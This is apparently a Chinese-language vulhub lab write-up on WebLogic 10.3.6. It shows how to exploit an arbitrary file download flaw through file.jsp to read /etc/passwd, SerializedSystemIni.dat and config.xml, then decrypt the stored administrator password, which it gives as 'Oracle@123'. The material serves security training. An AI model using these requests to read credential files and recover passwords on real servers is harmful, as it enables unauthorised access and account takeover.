复现环境
- Weblogic版本:10.3.6(11g)
- Java版本:1.6
- 启动本环境:vulhub
漏洞利用方法
- 本环境前台模拟了一个任意文件下载漏洞,访问
http://your-ip:7001/hello/file.jsp?path=/etc/passwd
可见成功读取passwd文件。
读取后台用户密文与密钥文件
-
Weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为
SerializedSystemIni.dat
和config.xml
。 -
在本环境中为
./security/SerializedSystemIni.dat
和./config/config.xml
(基于当前目录/root/Oracle/Middleware/user_projects/domains/base_domain
)。 -
获取AES加密秘钥:
http://your-ip:7001/hello/file.jsp?path=security/SerializedSystemIni.dat
- 将获取到的加密秘钥保存为
xxx.bat
。
- 将获取到的加密秘钥保存为
-
获取加密后的管理员密码:
http://your-ip:7001/hello/file.jsp?path=config/config.xml
- 打开
config.xml
文件,获取中的AES
。
- 打开
-
通过
密文
+秘钥
=明文
,来获取明文:
-
明文:
Oracle@123